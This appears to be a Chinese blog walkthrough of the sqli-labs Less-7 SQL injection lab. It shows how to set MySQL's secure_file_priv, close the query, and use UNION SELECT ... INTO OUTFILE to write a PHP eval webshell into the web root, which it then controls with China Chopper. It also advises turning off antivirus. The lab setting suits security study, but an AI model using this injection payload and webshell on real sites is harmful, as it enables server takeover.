Less-7使用的文件导出select ... into outfile ....,一个文件上传。

mysql安全配置里有一个配置secure_file_priv控制文件的导出导入。

secure_file_priv值的作用

  • 设置值为空,所有路径均可以导出导入。
  • 设置值为指定路径,只允许该路径的导出导入。
  • 设置值为Null,所有路径均不可导出导入。

    注意:默认是 Null



    可以使用命令set global secure_file_priv=进行修改,这里我们修改my.ini文件进行修改

在my.ini文件的 mysqld下方加入

修改完之后,重启mysql服务器,使用show variables like '%secure%'命令再次查看secure_file_priv的值是否成功修改





修改成功,开始实验

1.闭合sql语句

测试发现后端使用的sql语句查询是SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1



使用的是(('$id')),那么闭合方式就是id=1')) --+

这里找到了注入点,一般通过 order by 判断后可以直接使用 union select 语句进行查询,但是返回结果只有You are in.... Use outfile......You have an error in your SQL syntax ,也就是正确和错误,这一关可以使用sql盲注进行通过,为了学习,这里我们使用了mysql的一个文件上传

2.构造SQL语句写入一句话木马

select '内容' into outfile '路径'可以将内容到一个路径下

mysql测试:select 'nihao' into outfile 'C:\\phpstudy_pro\\www\\nihao.txt';



执行过这条语句后,会在c:\phpstudy_pro\www目录下生成一个nihao.txt的文件,内容为nihao

使用两个反斜杠\因为一个反斜杠是转义的意思,两个反斜杠才是一个反斜杠。

执行恶意SQL语句:http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST[cmd])?>' into outfile 'C:\\phpstudy_pro\\www\\hacker.php'--+

如果这里是Windows电脑,需要关闭自带的杀毒,否者会被检测杀死我们的木马

执行后会在c:\phpstudy_pro\www目录下生成一个hacker.php的文件,这就是我们的一句话木马



内容为

3.使用中国菜刀,中国蚁剑链接,这里我们中国菜刀连接。

打开中国菜刀,右键 -> 添加



输入我们SQL注入靶机的IP,连接密码为cmd,点击添加,进行连接



右键我们添加的靶机

  • 文件管理是看靶机的大概文件结构
  • 虚拟终端是进入靶机的命令行

我们点击虚拟终端,执行cmd命令whoami



成功获取靶机权限。盲注不在演示不走,和Less-5和Less-7类似

注意:这里获取靶机的权限是服务器以哪个用户身份运行的权限。

Less-7 '))闭合 和 secure_file_priv 配置写入一句话木马的更多相关文章

  1. 通过mysql写入一句话木马

    USE mysql;# MySQL 返回的查询结果为空(即零行). # MySQL 返回的查询结果为空(即零行). CREATE TABLE a( cmd1 text NOT NULL );# MyS ...

  2. 通过mysql写入php一句话木马

    利用mysql写入一句话木马 前提: root权限,知道了服务器的web的绝对路径 select "<?php @eval($_POST['pass']);?>" IN ...

  3. PHP 一句话木马

    eval 函数 eval() 函数把字符串按照 PHP 代码来计算 该字符串必须是合法的 PHP 代码,且必须以分号结尾 如果没有在代码字符串中调用 return 语句,则返回 NULL.如果代码中存 ...

  4. 渗透技术--SQL注入写一句话木马原理

    讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE 'C:\ ...

  5. 探索基于.NET下实现一句话木马之asmx篇

    0x01 前言 上篇介绍了一般处理程序(ashx)的工作原理以及实现一句话木马的过程,今天接着介绍Web Service程序 (asmx)下的工作原理和如何实现一句话木马,当然介绍之前笔者找到了一款a ...

  6. 探索基于.NET下实现一句话木马之ashx篇

    0x01 前言 在渗透测试的时候各种PHP版的一句话木马已经琳琅满目,而.NET平台下的一句话木马则百年不变,最常见的当属下面这句 笔者感觉有必要挖坑一下.NET平台里的一句话木马,经过一番摸索填坑终 ...

  7. 技术的正宗与野路子 c#, AOP动态代理实现动态权限控制(一) 探索基于.NET下实现一句话木马之asmx篇 asp.net core 系列 9 环境(Development、Staging 、Production)

    黄衫女子的武功似乎与周芷若乃是一路,飘忽灵动,变幻无方,但举手抬足之间却是正而不邪,如说周芷若形似鬼魅,那黄衫女子便是态拟神仙. 这段描写出自<倚天屠龙记>第三十八回. “九阴神抓”本是& ...

  8. 如何自己写aspx过狗D盾一句话木马

    hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx 本文作者:i春秋签约作家——凉风 引用 ...

  9. CTF-PHP一句话木马

    首先看一下题目 他是提示让你输入一个4位数的密码 使用burp进行密码爆破 我们使用burp来自动生成一个所有以4位数组成的密码 经过一段时间的爆破发现他的返回值都为192个字节,无法区别正确的密码. ...

  10. web攻防环境--一句话木马

    任务一.基于centos7搭建dvwa web服务靶机 1.在centos7安装LAMP并启动,访问phpinfo页面 也即安装httpd.php.mysql服务. 直接进行yum安装即可,完成后检查 ...

随机推荐

  1. maven本地安装jar包

    mvn install:install-file -Dfile=cs-pay-client-2.0.0.jar -DgroupId=com.test.pay -DartifactId=gh-epay- ...

  2. 工作三年的.NET程序员现状及其感悟

    算上实习,已经工作三年了.时间过的真的很快,我也从一开始的非标自动化行业成功转入了医疗器械行业,如今在苏州园区的BioBay工作,这里我每天都工作的挺开心的.也于11.6号第一次和如今的女朋友见面,并 ...

  3. Spring boot jar包解压后重新压缩命令

    进入解压的目录/demo,运行 jar cvfM0 demo.jar * 压缩后的项目即可运行 参考:https://www.cnblogs.com/liyanbin/p/6088458.html

  4. UR #3 核聚变反应强度( gcd )

    tags: -分解质因数 , gcd 题目大意 给定\(n\)个数,求\(a_1\)与\(a_i\)次小公约数 分析 易知次小公约数是\(\gcd\)的因数,于是用\(\gcd\)除去它的最小质因子即 ...

  5. find_in_set使用:匹配按逗号分隔后的内容

    SELECT  * FROM `tb_test` WHERE c_id ='123' AND create_time LIKE '2021-06-03%'  AND find_in_set('A362 ...

  6. oracle 锁用户和解锁。

    1 批量锁用户--数据库迁移后不允许在连接了 SELECT 'alter user '||username||' account lock;' from dba_users WHERE usernam ...

  7. 4、Redis底层原理(持久化+分布式锁)

    Redis底层原理 持久化 Redis虽然是个内存数据库,但是Redis支持RDB和AOF两种持久化机制,将数据写往磁盘,可以有效地避免因进程退出造成的数据丢失问题,当下次重启时利用之前持久化的文件即 ...

  8. maven资源导出问题

    <!--在build中配置resources,来防止我们资源导出失败的问题--> <build> <resources> <resource> < ...

  9. wampserver APACHE配置文件 和 单独安装APACHE 的配置文件 的区别

    wampserver APACHE配置文件: 单独安装APACHE 的配置文件

  10. Linux deploy 32位系统 怎么安装宝塔怎么安装linux系统安装宝塔后搭建网站

    getconf LONG_BIT 获取当前linux系统位数